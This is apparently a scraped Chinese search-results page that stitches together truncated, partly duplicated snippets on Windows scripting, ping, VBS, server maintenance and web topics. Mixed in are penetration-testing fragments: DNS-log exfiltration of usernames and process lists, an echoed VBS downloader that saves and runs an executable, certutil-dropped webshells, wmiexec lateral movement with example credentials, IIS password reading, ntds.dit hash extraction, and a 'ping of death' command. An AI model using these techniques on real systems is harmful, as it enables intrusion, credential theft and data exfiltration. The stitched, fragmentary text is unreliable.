没有公网的机器,内网 windows update参考https://cloud.tencent.com/document/product/213/2758 如果机器有公网,默认不用配啥,用系统自带的更新功能打补丁时自动连微软对公的...必须确保机器可以正常连接windows更新服务器或自定义的相关更新服务器,否则无法实现更新 (2)该脚本执行结束后,机器会重启以保证补丁生效 (3)脚本执行时间取决于补丁大小及网络状况等 另外,了解下使用 WUA 脱机扫描更新...VBScript 运行时错误: 没有权限 从上到下,依次是.vbs的第362行~第386行 C:\windows_update.vbs(366, 5) Microsoft VBScript 运行时错误...: 没有权限 + CategoryInfo : NotSpecified: (C:\windows_upda...ipt 运行时错误: 没有权限:String) [], RemoteException...: 10.255.5.6 NotSpecified: (:) [], RemoteException 通过winrm执行脚本,前365行的功能正常回显,执行到366行报错了,在系统内部直接执行脚本则完全正常
访问四次: ping www.baidu.com 不停止: ping www.baidu.com -t 特殊【ping】 (死亡之ping) ping -t -l 65550 ip 死亡之ping...语言包安装/删除向导,安装向导会提示下载语言包 41. lusrmgr.msc:本机用户和组 42. main.cpl:鼠标属性 43. mmsys.cpl:声音 45. mem.exe:显示内存使用情况(如果直接运行无效...-dlv :显示详细的许可证信息 slmgr.vbs -dli :显示许可证信息 slmgr.vbs -xpr :当前许可证截止日期 slmgr.vbs -dti :显示安装ID 以进行脱机激...) slmgr.vbs -ilc :(License file)安装许可证 slmgr.vbs -upk :卸载产品密钥 slmgr.vbs -skms :(name[ort] )批量授权...for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量) echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 echo 信息 在屏幕上显示出信息
删除向导,安装向导会提示下载语言包 41. lusrmgr.msc:本机用户和组 42. main.cpl:鼠标属性 43. mmsys.cpl:声音 45. mem.exe:显示内存使用情况(如果直接运行无效...以进行脱机激 slmgr.vbs -ipk :(Product Key)安装产品密钥 slmgr.vbs -ato :激活Windows slmgr.vbs -cpky :从注册表中清除产品密钥...(防止泄露引起的攻击) slmgr.vbs -ilc :(License file)安装许可证 slmgr.vbs -upk :卸载产品密钥 slmgr.vbs -skms :(...ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 ...ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows
删除向导,安装向导会提示下载语言包 41. lusrmgr.msc:本机用户和组 42. main.cpl:鼠标属性 43. mmsys.cpl:声音 45. mem.exe:显示内存使用情况(如果直接运行无效...-dlv :显示详细的许可证信息 slmgr.vbs -dli :显示许可证信息 slmgr.vbs -xpr :当前许可证截止日期 slmgr.vbs -dti :显示安装ID 以进行脱机激... slmgr.vbs -ipk :(Product Key)安装产品密钥 slmgr.vbs -ato :激活Windows slmgr.vbs -cpky :从注册表中清除产品密钥(...ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。 ...ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows
如果HTTP能出则大概率可以直接上线CS/MSF,只需想办法将文件落地到磁盘执行即可。...dnslog%26ping+-n+1+!FINAL!...(4) 查看杀软进程 执行以下命令可以将目标主机正在运行的进程列表给外带出来,在确定没有安全防护软件的情况下可以直接将CS/MSF文件落地到磁盘执行上线,不过也得注意上边提到的cmd /c、| 转义和空格等问题...wscript+C:\down.vbs 如果存在360等安全防护软件查杀木马,我们也可以使用Certutil编码哥斯拉的Webshell,然后通过这种方式将其落地到磁盘,certutil解码写入Webshell...\down.vbs echo+aGet.SaveToFile+"C:\360.exe",2>>C:\down.vbs echo+Shell.Run+("C:\360.exe")>>C:\down.vbs
================================= echo == 查询沙箱测试平台服务的状态, == echo == 每间隔10秒进行一次查询, == echo == 如发现其停止,则立即启动...nul echo . echo Wscript.Sleep WScript.Arguments(0) >%tmp%\delay.vbs cscript...//b //nologo %tmp%\delay.vbs 10000 del %_des% /Q echo ********程序启动完成******** goto checkstart :checkag...echo %time% 程序运行正常,10秒后继续检查.....echo Wscript.Sleep WScript.Arguments(0) >%tmp%\delay.vbs cscript //b //nologo %tmp%\delay.vbs 10000
protect_my_process.bat,文件保存编码为 ANSIC 码 @echo off :RESTART REM cd 到程序的目录下,防止其他问题出现 cd /d E: cd /d E:\yinzhuoqun\ REM 查找要运行软件进程名称是否存在...tasklist /nh|find /i "my_process.exe" REM 有则啥事不干,没有则启动该程序 If ERRORLEVEL 1 (start E:\yinzhuoqun\my_process.exe...) else (echo 程序已运行) REM 延时 10 * 2000 = 20s ping -n 10 -w 2000 127.0.0.1 > tblm_temp.txt REM 重新启动 goto...RESTART 隐藏 bat 脚本启动的 CMD 窗口: hide_cmd_window.vbs CreateObject("WScript.shell").Run"cmd /c E:\yinzhuoqun...Windows\System32\wscript.exe").Run"cmd /c E:\yinzhuoqun\protect_my_process.bat",0 windows 开机自启的启动目录 vbs
但是至少给我们的用户名字典(如果有需要的话),增加了一些信息,然而可惜的是注册还没五分钟我的账号就被删除并且被 T 了出来。没截到图,为了不打草惊蛇所以先 pass。...整直接准备拿着这份表进行爆破的时候,我发现了它 一个完全孤立于其他站点的,甚至除了图片素材没有其他信息有关我们目标的站。...gcc 编译就 gcc 编译吧 一运行,没反应。我:?,上传成 dll,用 rundll32 运行,没反应,我:??...ping,执行以下,dnslog 被触发了,说明 bat 执行力成功,但是没有成功起了我们的程序。...tasklist 一运行,没有这个指令,啊,没事了。 那么没有 vbs,没有 tasklist,该如何查看进程呢?经过 wbg 的一番提点,啊,才记起来,sqlserver 是可以调用 com 的。
加密说明 0x01 配置环境 拿到补丁源文件后,运行一下,发现会自动删除而且本地释放了 tem.vbs,这我可被吓得不轻,毕竟这玩意儿的行为太像小马了,而且软件的图标也是马,给我吓得不轻。...脱壳后 EXEINFO显示 动态分析 IDA不是很会,不过我对ollydbg比较熟悉,所以我直接将该插件在OD中运行,自动停在OEP上。...释放vbs CALL 释放vbs的头部 vbs的大致内我提取出来,就是下面的内容: Dim fso 既然这是一个关键call,那么我就有理由猜想会有调用该call的命令,所以我决定搜索call 00403E78...如果你不想要这个注册成功的窗口,可以把下方的call也nop掉。...0x03 插件速度优化,实现脱机 我成功找到了获取信息的call,那么我们可以直接将获取信息CALL nop掉,这时会出现未知错误的提示框 未知错误 我们将jnz指令改为jmp后就可以直接跳过未知错误
卸载stream对象,在cmd下或直接运行:regsvr32 /s /u “C:\ProgramFiles\CommonFiles\System\ado\msado15.dll” 如果想恢复的话只需要去掉...cmd命令net user 如果存在 mysql mssql这样用户或者类似的.通常就是它的mssql mysql服务已经被降权运行了 如何判断服务器上是否开启了mysql服务?...开了3306端口,有的管理员会把默认端口改掉.另一个判断方法就是网站是否支持php,一般支持的话都是用mysql数据库的. 如何查看root密码?...cookies\iispwd.vbs 意思是读取iis,这样一来,不但可以获取星外的帐号密码,还可以看到同服务器上的所有站点的目录 360提权 ---- 找个可读可写目录上传360.exe cmd命令:...解决方法:直接ping服务器ip,看回显信息进行判断 TTL=32 9X/ME TTL=64 linux TTL=128 2000X/XP TTL=255 UNIX 为什么有时
wmic 远程执行命令,在远程系统中启动 Windows Mannagement Instrumentation 服务(目标服务器需要开放 135 端口,wmic 会以管理员权限在远程系统中执行命令) 如果目标服务器开启了防火墙...进入到 examples 目录运行脚本获取远程目标系统的shell: python wmiexec.py Administrator:Admin12345@192.168.2.25 ?...---- wmiexec.vbs wmiexec.vbs 可以在远程系统中执行命令并进行回显,获得远程主机的半交互式shell: cscript.exe //nologo wmiexec.vbs /shell...输入如下命令,使用 wmiexec.vbs 在远程主机上执行单挑命令: cscript.exe wmiexec.vbs /cmd 192.168.3.21 administrator Admin12345...对于一些运行时间比较长的命令,例如 ping、systeminfo,需要添加一个参数:“-wait 5000”,或者更长的时间间隔。
大家在日常运维当中,如果Windows服务器的服务挂掉了怎么办,比如数据库、Tomcat、Redis等等。...ping -n %secs% 127.0.0.1 > nul goto chkit :end 注意:需要把Bat脚本文件设置为ANSI编码,否则会出现控制台中文乱码的情况。...大家如果编写了其他运维脚本也在首行可以加上这段,就可以实现自动以管理员身份运行。.../B :gotAdmin if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" ) 二、运行效果 这里我们把mysql服务停掉,然后执行...启动成功之后的效果 服务启动后,重新执行Bat脚本,效果如下图 三、封装为服务的方式运行 建议把Bat脚本打包为Windows服务器的方式运行,如果直接使用cmd窗口运行的话,有被关掉的风险,使用后台运行的方式更加可靠
许多不能与 I n t e r n e t连接的站点通过 U U C P链路与一个连接在 I n t e r n e t上的站点如U U N E T相连接。...在这个例子中,其他的邮件处理器则被告知“如果有邮件要发往 u s e r @ f o o . c o m,就将邮件送到r e l a y 1 . u u . n e t或r e l a y 2 . u...如果一个目的主机有多个M X记录,它们按优先值由小到大的顺序使用。 另一个M X记录的例子是处理主机脱机工作或不可达的情况。邮件处理器仅在无法使用T C P与目的主机连接时才使用 M X记录。...作者的主系统通过 S L I P链路与互联网相连,它在大多数时间内是脱机工作的,我们有 ? 为了显示优先值,我们使用了- v选项(该选项也会导致其他字段的输出)。...如果没有工作(即S L I P链路断开),会使用下一个更高优先值( 1 0)的邮件记录,并试图向主机 n o a o . e d u传送。如果它仍没有成功,发送将超时并在以后重新发送。
确保WAMP正在运行 为确保WAMP服务器正在运行,请检查任务栏中WAMP图标(大写W图标)的颜色。以下是可能的情况: 如果W图标为红色,则WAMP服务器未运行且处于脱机状态。...如果它是橙色,则服务器正在部分运行,即Apache(您的Web服务器)正在运行,而MySQL服务正在引导或处于脱机状态。通常,您应该等待30秒钟左右,如果该图标仍未变为绿色,则应重新启动服务器。...如果为绿色,则表示服务器已联机,应该可以通过Web浏览器进行访问。 ...如果数据库连接成功,会跳转到新的页面,如果数据库连接错误,可参考如何修复WordPress中的建立数据库连接时出错 在接下来的步骤中,输入您的站点标题,用户名,密码和其余所需数据。...您应该取消选中“建议搜索引擎不索引本站点”按钮(因为我们不希望搜索引擎在开发阶段或实验阶段将我们的网站编入索引),然后单击“安装WordPress”。 大功告成!
:如果你在命令提示符下或通过运行菜单只输入WMIC,都将进入WMIC的交互模式,每当一个命令执行完毕后,系统还会返回到WMIC提示符下。...135或445,则报如下错: [-] Could not connect: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。...如果对方主机开启了135和445,但是未开启admin$共享,则一直处于连接状态。 wmiexec.vbs wmiexec.vbs脚本通过VBS调用wmic来模拟psexec的功能。...对于运行时间比较长的命令,例如ping、systeminfo,需要添加 -wait 5000或者更长时间的参数。...在运行 nc 等不需要输入结果但需要一直运行的进程时,如果使用 -persist参数,就不需要使用 taskkill 命令来远程结束进程了。
假设你只想使用某个站点的黑暗主题。使用 localStorage,你不必每次重新打开浏览器并访问站点时都更改主题。...这意味着在页面上运行的任何 JavaScript 代码都可以访问存储,使你的应用程序容易受到「跨站点脚本(XSS)攻击」。...下面是一个使用 setItem 方法存储数据的简单示例: window.localStorage.setItem("Data", "Hello from localStorage") 如果在浏览器控制台上运行这段代码...运行代码之后,如果打开浏览器开发工具的 Applications 选项卡并单击 localStorage,就可以看到 Data 键。 「注意」:你只能在 localStorage 中存储字符串。...它还接受单个参数,即项的键,如果项不可用,则返回 undefined。
但是通过发现当前机器 DNS 是出网的: ping %USERNAME%.saulGoodman.dnslog.cn ? ? 既然 DNS 出网那可以直接配置 DNS 上线到 CS !...github.com/FunnyWolf/pystinger 这个东东可以让 Webshell 实现内网 Socks4 代理,让不出网机器上线到 MSF/CS,使用 python 写的一款工具,支持目标站点...发现只有这一台是域控:WIN-5CLDB63xxx$,随后 ping 域控机器名得到了域控的 IP:192.168.1.34 ?...至此当前域已经拿下了,如果想要执行在域控机器上执行命令到话,可以直接用 wmi 横向: cscript c:\bea\wmi.vbs /cmd 192.168.1.34 xxx\administrator...内网渗透就是要好好信息搜集,其实刚拿到这个 webshell 的时候如果查看 net view 发现域控也在共享列表,那么就能够直接通过 IPC 拿到域控了,所以并不是非要把目标上线到 CobaltStrike
这些密码的提取和破解可以脱机执行,因此将无法检测到。一旦攻击者提取了这些散列,它们便可以充当域上的任何用户,包括域管理员。 前言 在活动目录中,所有的数据都保存在ntds.dit中。...例如,如果管理员创建了两个用户对象(User1和User2),仅在其上设置了最小属性,然后向User2添加了10个字符的描述,则User2空间比User1空间大80个字节(20个字节)。...这种加密的目的是提供针对脱机数据提取的保护。 Microsoft为提供这种保护而引入的解决方案很复杂,由3层加密组成,其中2层使用RC4,第三层使用DES。...提取ntds.dit vssown.vbs github链接:https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs.../start 创建一个C盘的卷影拷贝 cscript vssown.vbs /create c 列出当前卷影拷贝 cscript vssown.vbs /list 可以看到id为{F27E8849
q=KB5012170%20Server2016 如果不放心,可以单独下载这些补丁去最新的公共镜像买的机器安装试试,如果已经被迭代,应该安装不上去 安不上要么是下的版本不匹配 ,版本对且安装不上就说明不需要安装了或是已经废弃或已经被后来更加新的补丁迭代掉了...catalog.s.download.windowsupdate.com 微软用了美国电信服务商verizon.com的全球加速,不一定所有地区所有运营商都那么慢吧 windows系统默认就是微软公网方式下载补丁,不排除部分客户端所在地域某些运营商访问微软站点慢...,但大多数时候速度还可以,我自己家里北京联通、天津联通感觉还行,也是走公网 从https://tools.ipip.net/ping.php 这里查域名访问延时和丢包率的话,国内部分地区部分运营商还可以...,也有部分不太行 我们没法对微软要求什么吧,只能改变自己,比如找个访问微软速度快的地方下载下来放到自己带宽充足的web站点,比如自己阿里云oss或其他云的对象存储、文件存储等等 腾讯云内网源wusin.bat...mirrors.tencentyun.com/install/windows/wusout.bat 双击.bat切换源,源是配合update客户端的,不是url直接下载的 客户端除过用系统自带的图形界面,也可以用微软官网的.vbs
领取专属 10元无门槛券
手把手带您无忧上云
